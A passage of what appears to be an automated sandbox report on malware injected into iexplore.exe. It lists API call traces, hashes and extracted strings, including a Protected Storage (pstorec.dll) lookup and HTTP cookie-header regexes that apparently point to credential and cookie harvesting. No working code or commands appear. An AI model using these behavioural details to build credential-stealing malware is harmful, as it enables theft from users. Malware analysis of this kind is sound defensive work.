      • Opcode ID: 49771684933d372b7cc1cc6b8bc31340e38024c9c413519fedf5d801805f07d2
      • Instruction ID: b35ac928e4a391234eb27dc9dc9346057de85a9a10cf9fe0fde19f0dc3f8cc49
      • Opcode Fuzzy Hash: 49771684933d372b7cc1cc6b8bc31340e38024c9c413519fedf5d801805f07d2
      • Instruction Fuzzy Hash: BB51E1B1D023699FEF71DB348C80BB9F7F8EB41254F1840EAD549AB142DB349AA4CB11
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: _memset$Exception@8H_prolog3_catchThrow
      • String ID:
      • API String ID: 3180429071-0
      • Opcode ID: e1b7375029ffa27449bb13240a7358891684e4032724d410d624592fb264397c
      • Instruction ID: 4bcfecc49620e4d077ce1da22574c290e9b29bd795cf5866e949113d2a37d025
      • Opcode Fuzzy Hash: e1b7375029ffa27449bb13240a7358891684e4032724d410d624592fb264397c
      • Instruction Fuzzy Hash: 84613D70901B499FE760DF74C888BEBB7F9EF44300F04492DE56AAA190D771AA54CB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • WriteFile.KERNEL32(?,?,00007D32,?,?), ref: 04B501A0
      • ResetEvent.KERNEL32(?), ref: 04B501B0
      • GetLastError.KERNEL32 ref: 04B501CA
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B501E4
      • SetEvent.KERNEL32(?), ref: 04B501FA
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B50206
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Event$DisconnectErrorFileLastNamedObjectPipeResetSingleWaitWrite
      • String ID:
      • API String ID: 3952501043-0
      • Opcode ID: 254ed7b3deff4bd984a7343e3a1750c3ac0f82762b2ac63c57de9be6a1e9db0c
      • Instruction ID: f3f1db5e63d9913eece71cf299d636d4ff169f2fedf97e91d8949d61290e1943
      • Opcode Fuzzy Hash: 254ed7b3deff4bd984a7343e3a1750c3ac0f82762b2ac63c57de9be6a1e9db0c
      • Instruction Fuzzy Hash: CF311A71D082189BDB20AF69DC809AAF7B9FF48314F5044EBE50ED6660D738BE509F61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __time64.LIBCMT ref: 03006864
        • Part of subcall function 03019C74: __aulldiv.LIBCMT ref: 03019C9F
        • Part of subcall function 03019522: __getptd.LIBCMT ref: 03019527
      • _malloc.LIBCMT ref: 03006873
        • Part of subcall function 0301948E: __FF_MSGBANNER.LIBCMT ref: 030194A7
        • Part of subcall function 0301948E: __NMSG_WRITE.LIBCMT ref: 030194AE
      • _rand.LIBCMT ref: 0300688C
      • _rand.LIBCMT ref: 030068A2
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: _rand$__aulldiv__getptd__time64_malloc
      • String ID:
      • API String ID: 1398773224-0
      • Opcode ID: a9b5b06c46db41426e274ab7c31bf76b9b5e1564b261450b39875dbf118bedbb
      • Instruction ID: 214ba632499a1b7324ec620d5db906c9d58985376ecb1ac06909f66c11bead81
      • Opcode Fuzzy Hash: a9b5b06c46db41426e274ab7c31bf76b9b5e1564b261450b39875dbf118bedbb
      • Instruction Fuzzy Hash: 4D01683B38730817F314F96668D2BDAB78FD7C17A0F04021AE1015E0C4CA6B8A6643B2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • WriteFile.KERNEL32(?,?,00000024,?,?), ref: 04B507AD
      • ResetEvent.KERNEL32(?), ref: 04B507BA
      • GetLastError.KERNEL32 ref: 04B507C5
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B507DC
      • SetEvent.KERNEL32(?), ref: 04B507EC
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B507F5
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Event$DisconnectErrorFileLastNamedObjectPipeResetSingleWaitWrite
      • String ID:
      • API String ID: 3952501043-0
      • Opcode ID: 36839b3dd215b76d0fec79dc54d0b62f2ed763b7f1fcc62bbb82cb0f7759a051
      • Instruction ID: 2bcdaad6310b257d90c1f2f42ba932dbab3bd35d2c2272d1f3262e645d6ab805
      • Opcode Fuzzy Hash: 36839b3dd215b76d0fec79dc54d0b62f2ed763b7f1fcc62bbb82cb0f7759a051
      • Instruction Fuzzy Hash: 5A01C031800204EFCB20AF69DC4899EFBF8EF44310B10866BE856D2570D730AA50CF71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • LoadLibraryA.KERNEL32(pstorec.dll), ref: 04B4C10D
      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 04B4C119
      • StrStrIA.SHLWAPI(00000000,?), ref: 04B4C273
        • Part of subcall function 04B70110: GetErrorInfo.OLEAUT32(00000000,00000000,?,?,04B4B839,00000000,?,04B71C90,?,?,?,?), ref: 04B70160
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: AddressErrorInfoLibraryLoadProc
      • String ID: PStoreCreateInstance$pstorec.dll
      • API String ID: 1186719886-2881415372
      • Opcode ID: 2b6a53dcfdf64a29c1f89e3ba979a8d2d1cf0d304e03228359535c885ad2bf1e
      • Instruction ID: 40b43fa5f710a887e88b17420c219ac6591e3cc6d8d36f38952b177ae364e9a5
      • Opcode Fuzzy Hash: 2b6a53dcfdf64a29c1f89e3ba979a8d2d1cf0d304e03228359535c885ad2bf1e
      • Instruction Fuzzy Hash: 8A713AB1A01249AFDF14DFE8CC84DEEBBB9EF88704B1484A9F515EB210D671AD05DB60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ReadFile.KERNEL32(?,?,00007D32,?,?), ref: 04B50863
      • GetLastError.KERNEL32 ref: 04B5086D
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50884
      • ResetEvent.KERNEL32(?), ref: 04B50891
      • ResetEvent.KERNEL32(?), ref: 04B5089C
      • SetEvent.KERNEL32(?), ref: 04B508AF
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B508B8
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Event$Reset$DisconnectErrorFileLastNamedObjectPipeReadSingleWait
      • String ID: "}
      • API String ID: 1515994312-3370080606
      • Opcode ID: abbdadf1dc0f09319d688feb18bc48a460d79bb08213868b77cf6fe64f565859
      • Instruction ID: dea8db01c108f9023b5fdd9fa346d8cdad79e3b238e240e82cb1cfa2d73036d5
      • Opcode Fuzzy Hash: abbdadf1dc0f09319d688feb18bc48a460d79bb08213868b77cf6fe64f565859
      • Instruction Fuzzy Hash: 8F31A071D081089AEB20AF65DC44ABDB7B8EF44704F0005E7E91EE61A0EB38BE45DE51
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 04B4DD80
      • GetProcAddress.KERNEL32(00000000), ref: 04B4DD87
      • GetCurrentProcess.KERNEL32(00000000), ref: 04B4DD97
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: AddressCurrentHandleModuleProcProcess
      • String ID: IsWow64Process$kernel32
      • API String ID: 4190356694-3789238822
      • Opcode ID: 6f5de23bcbea3f58773dcc06918c2421f8e7962813d15d46649852814a9e8b1f
      • Instruction ID: 9988150cbfa436c211a3bfa77d518cb86be2d11c12b9741ecbbbb4726053d58a
      • Opcode Fuzzy Hash: 6f5de23bcbea3f58773dcc06918c2421f8e7962813d15d46649852814a9e8b1f
      • Instruction Fuzzy Hash: 8FE0EC76951229FBCB10ABF89D0DADE7AACEB04695B504196F501E3304D778EE009AB0
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: _rand$_free$__getptd_malloc
      • String ID:
      • API String ID: 1020150146-0
      • Opcode ID: e5e19c9e5642ed9727d6ea8c25eb2c70895cf83e07064e10a286444378cfa3eb
      • Instruction ID: 695cd76597b1783c358bfa0f2a8d9e2e8a2594f53214bbbaf7a1abf6d26ccff2
      • Opcode Fuzzy Hash: e5e19c9e5642ed9727d6ea8c25eb2c70895cf83e07064e10a286444378cfa3eb
      • Instruction Fuzzy Hash: 460268759023199FFB64EFA4CC94BEDB7B5BB44301F0445EAD50AAA1E1DB309A84CF21
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: ErrorLast
      • String ID: Content-Length: {[0-9]+}$Location: {[0-9]+}$Set-Cookie:\b*{.+?}\n$charset={[A-Za-z0-9\-_]+}
      • API String ID: 1452528299-2371899818
      • Opcode ID: c56ee837aeb73537cc7703b97a1056655506038339425d23a7a6f8a96a0e2a74
      • Instruction ID: 5d3df39ab498393de4959a22a936c6819b9d54e631a92406528523eed4711e9b
      • Opcode Fuzzy Hash: c56ee837aeb73537cc7703b97a1056655506038339425d23a7a6f8a96a0e2a74
      • Instruction Fuzzy Hash: 26818FB1A00208AAEF24EBB9CC84EEEB7B9EFC5754F10016DE515A7191DB70A905DF20
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 463eb27ae0101f7680d9d60e11ec3ee895e3eb05d3754381921ec8dd6857302d
      • Instruction ID: efc28587dec5b5f98d20daa660e884f3e2ed15a6c9a068adfb05c5d24a0ab136
      • Opcode Fuzzy Hash: 463eb27ae0101f7680d9d60e11ec3ee895e3eb05d3754381921ec8dd6857302d
      • Instruction Fuzzy Hash: D871C07190025AEFDF21DFA4C980BBEFBB5FF48314B1446A9E962B7160D7306941CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: _memset$_vswprintf_sswprintf
      • String ID:
      • API String ID: 2013425531-0
      • Opcode ID: 4ac68d2a3e230798114dedf08794adf501855c56a8db905d213d5ae080811f08
      • Instruction ID: 4f95e886918efd07e16fe90600be0a9b2aa64037c29f4e16d89f5520a522a5c7
      • Opcode Fuzzy Hash: 4ac68d2a3e230798114dedf08794adf501855c56a8db905d213d5ae080811f08
      • Instruction Fuzzy Hash: 4571F3B680522CAEEB21DB64DC84EDEB7BDEF48210F0401E5E559E6151DA319B94CF60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 04B65D26: RtlEnterCriticalSection.NTDLL(00000000), ref: 04B65D50
      • RtlDecodePointer.NTDLL(04B76BF8), ref: 04B5B748
      • RtlDecodePointer.NTDLL ref: 04B5B759
        • Part of subcall function 04B5EAB7: RtlEncodePointer.NTDLL(00000000), ref: 04B5EAB9
      • RtlDecodePointer.NTDLL(-00000004), ref: 04B5B77F
      • RtlDecodePointer.NTDLL ref: 04B5B792
      • RtlDecodePointer.NTDLL ref: 04B5B79C
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: Pointer$Decode$CriticalEncodeEnterSection
      • String ID:
      • API String ID: 2427772772-0
      • Opcode ID: 6f858f294af5d71ab257386e01d39749a6ff5b24e16576f2e45b4da81ac9c9fa
      • Instruction ID: 0703ee5510f4daecbf0a200f0585b96b914693c05a486c0bf308ba350a0ae12a
      • Opcode Fuzzy Hash: 6f858f294af5d71ab257386e01d39749a6ff5b24e16576f2e45b4da81ac9c9fa
      • Instruction Fuzzy Hash: C931373190434ADFEF119FB8D98479CBAF0FB48314F1045AAD911A72A0DBB8B941CF29
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: Maklocchr$H_prolog3_catch__getptd
      • String ID:
      • API String ID: 743336837-0
      • Opcode ID: 983bab5b0512bb1b8f74f020f94422ed6fd8cf694e6a319630edcd627860d4f0
      • Instruction ID: c43e91c4b2db9d52f3530314e246b59c8bfe9f3e989f1b22c816c432c5185289
      • Opcode Fuzzy Hash: 983bab5b0512bb1b8f74f020f94422ed6fd8cf694e6a319630edcd627860d4f0
      • Instruction Fuzzy Hash: 89313AB9C01388AEDB11EFF9C4409EEBBF8FF48210F04856AE455EB240D3349A448FA5
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetEnvironmentStringsW.KERNEL32(?,?), ref: 04B666F6
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 04B66734
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?), ref: 04B66757
      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?), ref: 04B6676A
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: ByteCharEnvironmentMultiStringsWide$Free
      • String ID:
      • API String ID: 1557788787-0
      • Opcode ID: 7f733937975273f3de92b40ad6c5d6ca65df28d4002457f5e83990a4cdc5280c
      • Instruction ID: 58cfe3381e537f50209c8c9f00d04546ee513fd3e4aac9069036901594430dcc
      • Opcode Fuzzy Hash: 7f733937975273f3de92b40ad6c5d6ca65df28d4002457f5e83990a4cdc5280c
      • Instruction Fuzzy Hash: B4117372901224BB9F216FB59C88DBFBFBCEE45390B154492F806D3100EA389E408AF0
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
      • String ID:
      • API String ID: 955811338-0
      • Opcode ID: aca4cfe2289a3eabab7f571c5814fbe348beab410cb0d586a146524cce19b1a5
      • Instruction ID: c19e7bfbc44f7080cc86f63a43c6189bdf574dc64facc7bb6c606be7d70c11e9
      • Opcode Fuzzy Hash: aca4cfe2289a3eabab7f571c5814fbe348beab410cb0d586a146524cce19b1a5
      • Instruction Fuzzy Hash: 3F11C67A143714ABE311EBA69CC4EEB77A8EFC5770B140619F5258E5D0CFB1C4218661
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
      • String ID:
      • API String ID: 955811338-0
      • Opcode ID: f733bf0927586b9c21f6904405b1e722c0826ea437b17e5c95e99a88cdbb8fbe
      • Instruction ID: 0cd502dfa8f8026717545577a4fcfe3fdba069bb112fef2994ece46798fcc292
      • Opcode Fuzzy Hash: f733bf0927586b9c21f6904405b1e722c0826ea437b17e5c95e99a88cdbb8fbe
      • Instruction Fuzzy Hash: B911E53A146706AFE711EFA4DC849EB7BE8EF84670B004029F9158A190DB71C4218BA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 04B667BA
      • GetCurrentProcessId.KERNEL32 ref: 04B667C6
      • GetCurrentThreadId.KERNEL32 ref: 04B667CE
      • GetTickCount.KERNEL32 ref: 04B667D6
      • QueryPerformanceCounter.KERNEL32(?), ref: 04B667E2
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: 7c6d509a71c71d5c974c606543502b3e8d0ec8f25969e03e32dc8eb93d02d740
      • Instruction ID: 9fb9f43f4e77b891b5a935b37fce389b5c8119542590848c2adbf2af70c7e96e
      • Opcode Fuzzy Hash: 7c6d509a71c71d5c974c606543502b3e8d0ec8f25969e03e32dc8eb93d02d740
      • Instruction Fuzzy Hash: 0D112976D002249FDB109FFDD54869EB7F4EF48361F550962D906EB200DB78AD408FA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 0300237D
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 030023C7
      • __CxxThrowException@8.LIBCMT ref: 030023D5
      • std::locale::facet::_Incref.LIBCPMT ref: 030023E5
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 030023EB
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: 09f9d48bcac438c939527bbaa6173e17ade3be65ee7a1129c096f9fb9225c7d7
      • Instruction ID: 54f45e157524df27c4a3ff400c5e4b3144613e2f4f418148bb3de39a8f54c771
      • Opcode Fuzzy Hash: 09f9d48bcac438c939527bbaa6173e17ade3be65ee7a1129c096f9fb9225c7d7
      • Instruction Fuzzy Hash: CA01B13E902618ABDB05F7B4DD449EE776DDFC4624F640525E9016F2C0DF309B068791
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 03004545
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 0300458F
      • __CxxThrowException@8.LIBCMT ref: 0300459D
      • std::locale::facet::_Incref.LIBCPMT ref: 030045AD
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 030045B3
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: d5c824dee08d929fa1dc70b4feecc739d9e21b1f6927e8323ca6b3c08391305e
      • Instruction ID: ea50338fc4cd5d0cef9095a67dd149006fca2fdd2e024e34cb125014626e3f4c
      • Opcode Fuzzy Hash: d5c824dee08d929fa1dc70b4feecc739d9e21b1f6927e8323ca6b3c08391305e
      • Instruction Fuzzy Hash: 9C01B17E902618AADB06F7A5CC409EE77B9DFC0621F640169E6016F2C1DF309B068BD1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 030045D4
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 0300461E
      • __CxxThrowException@8.LIBCMT ref: 0300462C
      • std::locale::facet::_Incref.LIBCPMT ref: 0300463C
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 03004642
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: e4f82450981f15ce1ba1b26dcdb35df70b581fe23c22ca7dc015d5a0d9c74c2a
      • Instruction ID: b1b591594bf68d48de839880ade27b41b1ad0f295708ddf952b2eb2ba5a83950
      • Opcode Fuzzy Hash: e4f82450981f15ce1ba1b26dcdb35df70b581fe23c22ca7dc015d5a0d9c74c2a
      • Instruction Fuzzy Hash: 1F01B13E902718AADB06FBA5CC409EE7769DFC0A21F650019E611AF2C0EF309B058B95
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __getptd_noexit.LIBCMT ref: 0301D7AE
        • Part of subcall function 0301ECBF: ___set_flsgetvalue.LIBCMT ref: 0301ECD1
        • Part of subcall function 0301ECBF: __calloc_crt.LIBCMT ref: 0301ECE5
      • __calloc_crt.LIBCMT ref: 0301D7D0
      • __get_sys_err_msg.LIBCMT ref: 0301D7EE
      • _strcpy_s.LIBCMT ref: 0301D7F6
      • __invoke_watson.LIBCMT ref: 0301D80B
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
      • String ID:
      • API String ID: 27446768-0
      • Opcode ID: cc8de13b912e155f5b285bd46f8ab87ee0026d1c9da97eaabf396c08645b0e30
      • Instruction ID: dcfe1219e36251a1a8612287d6c94c5ccfad89846b61d59cbdc8aaf4a9fc11ef
      • Opcode Fuzzy Hash: cc8de13b912e155f5b285bd46f8ab87ee0026d1c9da97eaabf396c08645b0e30
      • Instruction Fuzzy Hash: D0F0E0776033546BD720F6255CC49BF73DCCBC1615B14057AF9499B300F565D8608291
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __CreateFrameInfo.LIBCMT ref: 0301DDAB
        • Part of subcall function 0301920B: __getptd.LIBCMT ref: 03019219
        • Part of subcall function 0301920B: __getptd.LIBCMT ref: 03019227
      • __getptd.LIBCMT ref: 0301DDB5
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 0301DDC3
      • __getptd.LIBCMT ref: 0301DDD1
      • __getptd.LIBCMT ref: 0301DDDC
        • Part of subcall function 030192B0: __CallSettingFrame@12.LIBCMT ref: 030192FC
        • Part of subcall function 0301DEA9: __getptd.LIBCMT ref: 0301DEB8
        • Part of subcall function 0301DEA9: __getptd.LIBCMT ref: 0301DEC6
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
      • String ID:
      • API String ID: 3282538202-0
      • Opcode ID: 2baf96e4be4c86346ad04d04732bb72bb2641451ca0dbdef8e85c0229348806c
      • Instruction ID: 568d7641777ef4e49ab5fe03c0fc4fb047bda82a9ab98b90dbafb33cc8c38e82
      • Opcode Fuzzy Hash: 2baf96e4be4c86346ad04d04732bb72bb2641451ca0dbdef8e85c0229348806c
      • Instruction Fuzzy Hash: EC11C6B9C01309DFDB00EFA4D845AEDBBB0FF48315F508569E814AB290DB389A61DF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __getptd.LIBCMT ref: 030205BC
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 030205D3
      • __amsg_exit.LIBCMT ref: 030205E1
      • __lock.LIBCMT ref: 030205F1
      • __updatetlocinfoEx_nolock.LIBCMT ref: 03020605
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
      • String ID:
      • API String ID: 938513278-0
      • Opcode ID: e34d1a057c43d271e3191c749b6860becfee648bffc0441adb708c1ebd2b448d
      • Instruction ID: 8a6bf329fd07d9c5672606fde644fabcf9a51bb728f3ec880fcc574ba5c3922f
      • Opcode Fuzzy Hash: e34d1a057c43d271e3191c749b6860becfee648bffc0441adb708c1ebd2b448d
      • Instruction Fuzzy Hash: 28F0907A903734DFE761FB69C80578E7AA06F81720F554609D9546F2C0CF345641CBA6
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • std::locale::facet::_Incref.LIBCPMT ref: 03004E01
        • Part of subcall function 0300116C: std::_Lockit::_Lockit.LIBCPMT ref: 03001178
        • Part of subcall function 030045C7: std::_Lockit::_Lockit.LIBCPMT ref: 030045D4
      • _Maklocchr.LIBCPMT ref: 03004E4C
      • _strcspn.LIBCMT ref: 03004F7C
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Similarity
      • API ID: LockitLockit::_std::_$IncrefMaklocchr_strcspnstd::locale::facet::_
      • String ID: e
      • API String ID: 1200910443-4024072794
      • Opcode ID: f326ef98840cc4be8509d46d12437bd2230c7bd652c0c5fd26a5cede7e60a9c3
      • Instruction ID: 291987b8c6a6c1a4b09cbc6b7b214109b9603aef866db2005ef03edeb0f8fa4f
      • Opcode Fuzzy Hash: f326ef98840cc4be8509d46d12437bd2230c7bd652c0c5fd26a5cede7e60a9c3
      • Instruction Fuzzy Hash: 3A023475D01219AFEF15DFA9CD44AEEBBB9FF08300F044059E905AB2A1D771AA21CF94
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 030153B3
        • Part of subcall function 0300CE49: _free.LIBCMT ref: 0300CEAA
      • __CxxThrowException@8.LIBCMT ref: 030156D3
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3_catch_Throw_free
      • String ID: ($6
      • API String ID: 906823379-4149066357
      • Opcode ID: 7ee744ec6394fb3316395dbbf275ea6708156eea982f92616205eaf157013e2b
      • Instruction ID: 6a6c9938c7c76d33ba6dff5709f89e882b699aaefc393a17ba7219af61b1a904
      • Opcode Fuzzy Hash: 7ee744ec6394fb3316395dbbf275ea6708156eea982f92616205eaf157013e2b
      • Instruction Fuzzy Hash: 7B91F371D00228AFEB219F65CC84BDEBA79FF49350F4081D6F64CAA261CB711E959F60
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
